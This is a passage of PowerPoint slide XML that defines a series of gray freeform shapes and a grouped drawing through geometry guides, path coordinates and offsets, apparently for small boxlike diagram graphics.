                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1110" y="2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4" name="Freeform 1526"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4632" y="2553"/>
                <a:ext cx="81" cy="41"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T1" fmla="*/ 298 h 567"/>
                  <a:gd name="T2" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T3" fmla="*/ 567 h 567"/>
                  <a:gd name="T4" fmla="*/ 0 w 1110"/>
                  <a:gd name="T5" fmla="*/ 269 h 567"/>
                  <a:gd name="T6" fmla="*/ 0 w 1110"/>
                  <a:gd name="T7" fmla="*/ 0 h 567"/>
                  <a:gd name="T8" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T9" fmla="*/ 298 h 5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10"/>
                  <a:gd name="T16" fmla="*/ 0 h 567"/>
                  <a:gd name="T17" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T18" fmla="*/ 567 h 56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10" h="567">
                    <a:moveTo>
                      <a:pt x="1110" y="298"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1110" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1110" y="2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5" name="Freeform 1527"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4632" y="2573"/>
                <a:ext cx="81" cy="46"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T1" fmla="*/ 298 h 633"/>
                  <a:gd name="T2" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T3" fmla="*/ 633 h 633"/>
                  <a:gd name="T4" fmla="*/ 0 w 1110"/>
                  <a:gd name="T5" fmla="*/ 336 h 633"/>
                  <a:gd name="T6" fmla="*/ 0 w 1110"/>
                  <a:gd name="T7" fmla="*/ 0 h 633"/>
                  <a:gd name="T8" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T9" fmla="*/ 298 h 6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10"/>
                  <a:gd name="T16" fmla="*/ 0 h 633"/>
                  <a:gd name="T17" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T18" fmla="*/ 633 h 6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10" h="633">
                    <a:moveTo>
                      <a:pt x="1110" y="298"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1110" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1110" y="2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6" name="Freeform 1528"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4627" y="2474"/>
                <a:ext cx="5" cy="124"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 68"/>
                  <a:gd name="T1" fmla="*/ 0 h 1701"/>
                  <a:gd name="T2" fmla="*/ 0 w 68"/>
                  <a:gd name="T3" fmla="*/ 1682 h 1701"/>
                  <a:gd name="T4" fmla="*/ 68 w 68"/>
                  <a:gd name="T5" fmla="*/ 1701 h 1701"/>
                  <a:gd name="T6" fmla="*/ 68 w 68"/>
                  <a:gd name="T7" fmla="*/ 19 h 1701"/>
                  <a:gd name="T8" fmla="*/ 0 w 68"/>
                  <a:gd name="T9" fmla="*/ 0 h 17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"/>
                  <a:gd name="T16" fmla="*/ 0 h 1701"/>
                  <a:gd name="T17" fmla="*/ 68 w 68"/>
                  <a:gd name="T18" fmla="*/ 1701 h 170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" h="1701">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="1701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="19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7" name="Freeform 1529"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4718" y="2498"/>
                <a:ext cx="4" cy="123"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 55 w 55"/>
                  <a:gd name="T1" fmla="*/ 0 h 1696"/>
                  <a:gd name="T2" fmla="*/ 55 w 55"/>
                  <a:gd name="T3" fmla="*/ 1682 h 1696"/>
                  <a:gd name="T4" fmla="*/ 0 w 55"/>
                  <a:gd name="T5" fmla="*/ 1696 h 1696"/>
                  <a:gd name="T6" fmla="*/ 0 w 55"/>
                  <a:gd name="T7" fmla="*/ 17 h 1696"/>
                  <a:gd name="T8" fmla="*/ 55 w 55"/>
                  <a:gd name="T9" fmla="*/ 0 h 16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1696"/>
                  <a:gd name="T17" fmla="*/ 55 w 55"/>
                  <a:gd name="T18" fmla="*/ 1696 h 169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1696">
                    <a:moveTo>
                      <a:pt x="55" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="55" y="1682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1696"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55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8" name="Freeform 1530"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4627" y="2473"/>
                <a:ext cx="95" cy="26"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1306"/>
                  <a:gd name="T1" fmla="*/ 14 h 352"/>
                  <a:gd name="T2" fmla="*/ 54 w 1306"/>
                  <a:gd name="T3" fmla="*/ 0 h 352"/>
                  <a:gd name="T4" fmla="*/ 1306 w 1306"/>
                  <a:gd name="T5" fmla="*/ 335 h 352"/>
                  <a:gd name="T6" fmla="*/ 1251 w 1306"/>
                  <a:gd name="T7" fmla="*/ 352 h 352"/>
                  <a:gd name="T8" fmla="*/ 0 w 1306"/>
                  <a:gd name="T9" fmla="*/ 14 h 3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06"/>
                  <a:gd name="T16" fmla="*/ 0 h 352"/>
                  <a:gd name="T17" fmla="*/ 1306 w 1306"/>
                  <a:gd name="T18" fmla="*/ 352 h 3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06" h="352">
                    <a:moveTo>
                      <a:pt x="0" y="14"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="54" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1306" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1251" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="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9" name="Freeform 1531"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4632" y="2476"/>
                <a:ext cx="81" cy="31"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1110"/>
                  <a:gd name="T1" fmla="*/ 0 h 430"/>
                  <a:gd name="T2" fmla="*/ 0 w 1110"/>
                  <a:gd name="T3" fmla="*/ 132 h 430"/>
                  <a:gd name="T4" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T5" fmla="*/ 430 h 430"/>
                  <a:gd name="T6" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T7" fmla="*/ 300 h 430"/>
                  <a:gd name="T8" fmla="*/ 0 w 1110"/>
                  <a:gd name="T9" fmla="*/ 0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10"/>
                  <a:gd name="T16" fmla="*/ 0 h 430"/>
                  <a:gd name="T17" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T18" fmla="*/ 430 h 4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10" h="430">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1110" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1110" y="30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40" name="Freeform 1532"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4797" y="2529"/>
                <a:ext cx="77" cy="111"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1056 w 1056"/>
                  <a:gd name="T1" fmla="*/ 283 h 1519"/>
                  <a:gd name="T2" fmla="*/ 1056 w 1056"/>
                  <a:gd name="T3" fmla="*/ 1228 h 1519"/>
                  <a:gd name="T4" fmla="*/ 0 w 1056"/>
                  <a:gd name="T5" fmla="*/ 1519 h 1519"/>
                  <a:gd name="T6" fmla="*/ 0 w 1056"/>
                  <a:gd name="T7" fmla="*/ 0 h 1519"/>
                  <a:gd name="T8" fmla="*/ 1056 w 1056"/>
                  <a:gd name="T9" fmla="*/ 283 h 15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56"/>
                  <a:gd name="T16" fmla="*/ 0 h 1519"/>
                  <a:gd name="T17" fmla="*/ 1056 w 1056"/>
                  <a:gd name="T18" fmla="*/ 1519 h 15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56" h="1519">
                    <a:moveTo>
                      <a:pt x="1056" y="283"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1056" y="1228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1519"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1056" y="283"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="5F5F5F"/>
              </a:soli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41" name="Freeform 1533"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4797" y="2619"/>
                <a:ext cx="77" cy="41"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1056"/>
                  <a:gd name="T1" fmla="*/ 291 h 574"/>
                  <a:gd name="T2" fmla="*/ 1056 w 1056"/>
                  <a:gd name="T3" fmla="*/ 0 h 574"/>
                  <a:gd name="T4" fmla="*/ 1056 w 1056"/>
                  <a:gd name="T5" fmla="*/ 574 h 574"/>
                  <a:gd name="T6" fmla="*/ 0 w 1056"/>
                  <a:gd name="T7" fmla="*/ 291 h 57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56"/>
                  <a:gd name="T13" fmla="*/ 0 h 574"/>
                  <a:gd name="T14" fmla="*/ 1056 w 1056"/>
                  <a:gd name="T15" fmla="*/ 574 h 57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56" h="574">
                    <a:moveTo>
                      <a:pt x="0" y="291"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1056" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1056" y="574"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="29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42" name="Freeform 1534"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4793" y="2518"/>
                <a:ext cx="4" cy="123"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 57 w 57"/>
                  <a:gd name="T1" fmla="*/ 0 h 1696"/>
                  <a:gd name="T2" fmla="*/ 57 w 57"/>
                  <a:gd name="T3" fmla="*/ 1680 h 1696"/>
                  <a:gd name="T4" fmla="*/ 0 w 57"/>
                  <a:gd name="T5" fmla="*/ 1696 h 1696"/>
                  <a:gd name="T6" fmla="*/ 0 w 57"/>
                  <a:gd name="T7" fmla="*/ 14 h 1696"/>
                  <a:gd name="T8" fmla="*/ 57 w 57"/>
                  <a:gd name="T9" fmla="*/ 0 h 16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7"/>
                  <a:gd name="T16" fmla="*/ 0 h 1696"/>
                  <a:gd name="T17" fmla="*/ 57 w 57"/>
                  <a:gd name="T18" fmla="*/ 1696 h 169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7" h="1696">
                    <a:moveTo>
                      <a:pt x="57" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="57" y="1680"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1696"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="14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43" name="Freeform 1535"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4874" y="2540"/>
                <a:ext cx="5" cy="124"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 73"/>
                  <a:gd name="T1" fmla="*/ 0 h 1701"/>
                  <a:gd name="T2" fmla="*/ 0 w 73"/>
                  <a:gd name="T3" fmla="*/ 1679 h 1701"/>
                  <a:gd name="T4" fmla="*/ 73 w 73"/>
                  <a:gd name="T5" fmla="*/ 1701 h 1701"/>
                  <a:gd name="T6" fmla="*/ 73 w 73"/>
                  <a:gd name="T7" fmla="*/ 19 h 1701"/>
                  <a:gd name="T8" fmla="*/ 0 w 73"/>
                  <a:gd name="T9" fmla="*/ 0 h 17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1701"/>
                  <a:gd name="T17" fmla="*/ 73 w 73"/>
                  <a:gd name="T18" fmla="*/ 1701 h 170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1701">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="1701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="19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44" name="Freeform 1536"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4792" y="2516"/>
                <a:ext cx="1" cy="125"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 14"/>
                  <a:gd name="T1" fmla="*/ 0 h 1715"/>
                  <a:gd name="T2" fmla="*/ 0 w 14"/>
                  <a:gd name="T3" fmla="*/ 1680 h 1715"/>
                  <a:gd name="T4" fmla="*/ 14 w 14"/>
                  <a:gd name="T5" fmla="*/ 1715 h 1715"/>
                  <a:gd name="T6" fmla="*/ 14 w 14"/>
                  <a:gd name="T7" fmla="*/ 33 h 1715"/>
                  <a:gd name="T8" fmla="*/ 0 w 14"/>
                  <a:gd name="T9" fmla="*/ 0 h 17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715"/>
                  <a:gd name="T17" fmla="*/ 14 w 14"/>
                  <a:gd name="T18" fmla="*/ 1715 h 17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715">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1680"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1715"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="33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45" name="Freeform 1537"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4793" y="2528"/>
                <a:ext cx="81" cy="46"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T1" fmla="*/ 298 h 634"/>
                  <a:gd name="T2" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T3" fmla="*/ 634 h 634"/>
                  <a:gd name="T4" fmla="*/ 0 w 1110"/>
                  <a:gd name="T5" fmla="*/ 336 h 634"/>
                  <a:gd name="T6" fmla="*/ 0 w 1110"/>
                  <a:gd name="T7" fmla="*/ 0 h 634"/>
                  <a:gd name="T8" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T9" fmla="*/ 298 h 6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10"/>
                  <a:gd name="T16" fmla="*/ 0 h 634"/>
                  <a:gd name="T17" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T18" fmla="*/ 634 h 6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10" h="634">
                    <a:moveTo>
                      <a:pt x="1110" y="298"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1110" y="634"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1110" y="2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46" name="Freeform 1538"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4793" y="2553"/>
                <a:ext cx="81" cy="41"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T1" fmla="*/ 298 h 565"/>
                  <a:gd name="T2" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T3" fmla="*/ 565 h 565"/>
                  <a:gd name="T4" fmla="*/ 0 w 1110"/>
                  <a:gd name="T5" fmla="*/ 267 h 565"/>
                  <a:gd name="T6" fmla="*/ 0 w 1110"/>
                  <a:gd name="T7" fmla="*/ 0 h 565"/>
                  <a:gd name="T8" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T9" fmla="*/ 298 h 5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10"/>
                  <a:gd name="T16" fmla="*/ 0 h 565"/>
                  <a:gd name="T17" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T18" fmla="*/ 565 h 5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10" h="565">
                    <a:moveTo>
                      <a:pt x="1110" y="298"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1110" y="565"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1110" y="2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47" name="Freeform 1539"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4788" y="2517"/>
                <a:ext cx="5" cy="124"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 69"/>
                  <a:gd name="T1" fmla="*/ 0 h 1699"/>
                  <a:gd name="T2" fmla="*/ 0 w 69"/>
                  <a:gd name="T3" fmla="*/ 1680 h 1699"/>
                  <a:gd name="T4" fmla="*/ 69 w 69"/>
                  <a:gd name="T5" fmla="*/ 1699 h 1699"/>
                  <a:gd name="T6" fmla="*/ 69 w 69"/>
                  <a:gd name="T7" fmla="*/ 19 h 1699"/>
                  <a:gd name="T8" fmla="*/ 0 w 69"/>
                  <a:gd name="T9" fmla="*/ 0 h 16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9"/>
                  <a:gd name="T16" fmla="*/ 0 h 1699"/>
                  <a:gd name="T17" fmla="*/ 69 w 69"/>
                  <a:gd name="T18" fmla="*/ 1699 h 16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9" h="1699">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1680"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="1699"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69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48" name="Freeform 1540"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4879" y="2541"/>
                <a:ext cx="4" cy="123"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 52 w 52"/>
                  <a:gd name="T1" fmla="*/ 0 h 1696"/>
                  <a:gd name="T2" fmla="*/ 52 w 52"/>
                  <a:gd name="T3" fmla="*/ 1679 h 1696"/>
                  <a:gd name="T4" fmla="*/ 0 w 52"/>
                  <a:gd name="T5" fmla="*/ 1696 h 1696"/>
                  <a:gd name="T6" fmla="*/ 0 w 52"/>
                  <a:gd name="T7" fmla="*/ 14 h 1696"/>
                  <a:gd name="T8" fmla="*/ 52 w 52"/>
                  <a:gd name="T9" fmla="*/ 0 h 16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1696"/>
                  <a:gd name="T17" fmla="*/ 52 w 52"/>
                  <a:gd name="T18" fmla="*/ 1696 h 169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1696">
                    <a:moveTo>
                      <a:pt x="52" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="52" y="1679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1696"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5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49" name="Freeform 1541"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4788" y="2516"/>
                <a:ext cx="95" cy="26"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1304"/>
                  <a:gd name="T1" fmla="*/ 14 h 350"/>
                  <a:gd name="T2" fmla="*/ 52 w 1304"/>
                  <a:gd name="T3" fmla="*/ 0 h 350"/>
                  <a:gd name="T4" fmla="*/ 1304 w 1304"/>
                  <a:gd name="T5" fmla="*/ 336 h 350"/>
                  <a:gd name="T6" fmla="*/ 1252 w 1304"/>
                  <a:gd name="T7" fmla="*/ 350 h 350"/>
                  <a:gd name="T8" fmla="*/ 0 w 1304"/>
                  <a:gd name="T9" fmla="*/ 14 h 3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04"/>
                  <a:gd name="T16" fmla="*/ 0 h 350"/>
                  <a:gd name="T17" fmla="*/ 1304 w 1304"/>
                  <a:gd name="T18" fmla="*/ 350 h 3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04" h="350">
                    <a:moveTo>
                      <a:pt x="0" y="14"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="52" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1304" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1252" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="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50" name="Freeform 1542"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4793" y="2519"/>
                <a:ext cx="81" cy="31"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1110"/>
                  <a:gd name="T1" fmla="*/ 0 h 430"/>
                  <a:gd name="T2" fmla="*/ 0 w 1110"/>
                  <a:gd name="T3" fmla="*/ 132 h 430"/>
                  <a:gd name="T4" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T5" fmla="*/ 430 h 430"/>
                  <a:gd name="T6" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T7" fmla="*/ 298 h 430"/>
                  <a:gd name="T8" fmla="*/ 0 w 1110"/>
                  <a:gd name="T9" fmla="*/ 0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10"/>
                  <a:gd name="T16" fmla="*/ 0 h 430"/>
                  <a:gd name="T17" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T18" fmla="*/ 430 h 4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10" h="430">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1110" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1110" y="29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451" name="Group 2328"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="6049228" y="2911528"/>
              <a:ext cx="976483" cy="702446"/>
              <a:chOff x="3519" y="2394"/>
              <a:chExt cx="816" cy="587"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="452" name="Freeform 1477"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="3519" y="2575"/>
                <a:ext cx="587" cy="380"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3821"/>
                  <a:gd name="T1" fmla="*/ 2473 h 2473"/>
                  <a:gd name="T2" fmla="*/ 0 w 3821"/>
                  <a:gd name="T3" fmla="*/ 1025 h 2473"/>
                  <a:gd name="T4" fmla="*/ 3821 w 3821"/>
                  <a:gd name="T5" fmla="*/ 0 h 2473"/>
                  <a:gd name="T6" fmla="*/ 3821 w 3821"/>
                  <a:gd name="T7" fmla="*/ 1448 h 2473"/>
                  <a:gd name="T8" fmla="*/ 0 w 3821"/>
                  <a:gd name="T9" fmla="*/ 2473 h 24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21"/>
                  <a:gd name="T16" fmla="*/ 0 h 2473"/>
                  <a:gd name="T17" fmla="*/ 3821 w 3821"/>
                  <a:gd name="T18" fmla="*/ 2473 h 24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21" h="2473">
                    <a:moveTo>
                      <a:pt x="0" y="2473"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3821" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3821" y="1448"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="247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53" name="Freeform 1478"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="3519" y="2394"/>
                <a:ext cx="701" cy="339"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4562 w 4562"/>
                  <a:gd name="T1" fmla="*/ 1180 h 2205"/>
                  <a:gd name="T2" fmla="*/ 3821 w 4562"/>
                  <a:gd name="T3" fmla="*/ 0 h 2205"/>
                  <a:gd name="T4" fmla="*/ 0 w 4562"/>
                  <a:gd name="T5" fmla="*/ 1024 h 2205"/>
                  <a:gd name="T6" fmla="*/ 741 w 4562"/>
                  <a:gd name="T7" fmla="*/ 2205 h 2205"/>
                  <a:gd name="T8" fmla="*/ 4562 w 4562"/>
                  <a:gd name="T9" fmla="*/ 1180 h 2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62"/>
                  <a:gd name="T16" fmla="*/ 0 h 2205"/>
                  <a:gd name="T17" fmla="*/ 4562 w 4562"/>
                  <a:gd name="T18" fmla="*/ 2205 h 220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62" h="2205">
                    <a:moveTo>
                      <a:pt x="4562" y="1180"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3821" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1024"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="741" y="2205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4562" y="118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54" name="Freeform 1479"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4106" y="2551"/>
                <a:ext cx="229" cy="182"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 746 w 1487"/>
                  <a:gd name="T1" fmla="*/ 0 h 1181"/>
                  <a:gd name="T2" fmla="*/ 1487 w 1487"/>
                  <a:gd name="T3" fmla="*/ 1181 h 1181"/>
                  <a:gd name="T4" fmla="*/ 1487 w 1487"/>
                  <a:gd name="T5" fmla="*/ 1181 h 1181"/>
                  <a:gd name="T6" fmla="*/ 0 w 1487"/>
                  <a:gd name="T7" fmla="*/ 783 h 1181"/>
                  <a:gd name="T8" fmla="*/ 746 w 1487"/>
                  <a:gd name="T9" fmla="*/ 0 h 11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87"/>
                  <a:gd name="T16" fmla="*/ 0 h 1181"/>
                  <a:gd name="T17" fmla="*/ 1487 w 1487"/>
                  <a:gd name="T18" fmla="*/ 1181 h 118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87" h="1181">
                    <a:moveTo>
                      <a:pt x="746" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1487" y="1181"/>
                    </a:lnTo>
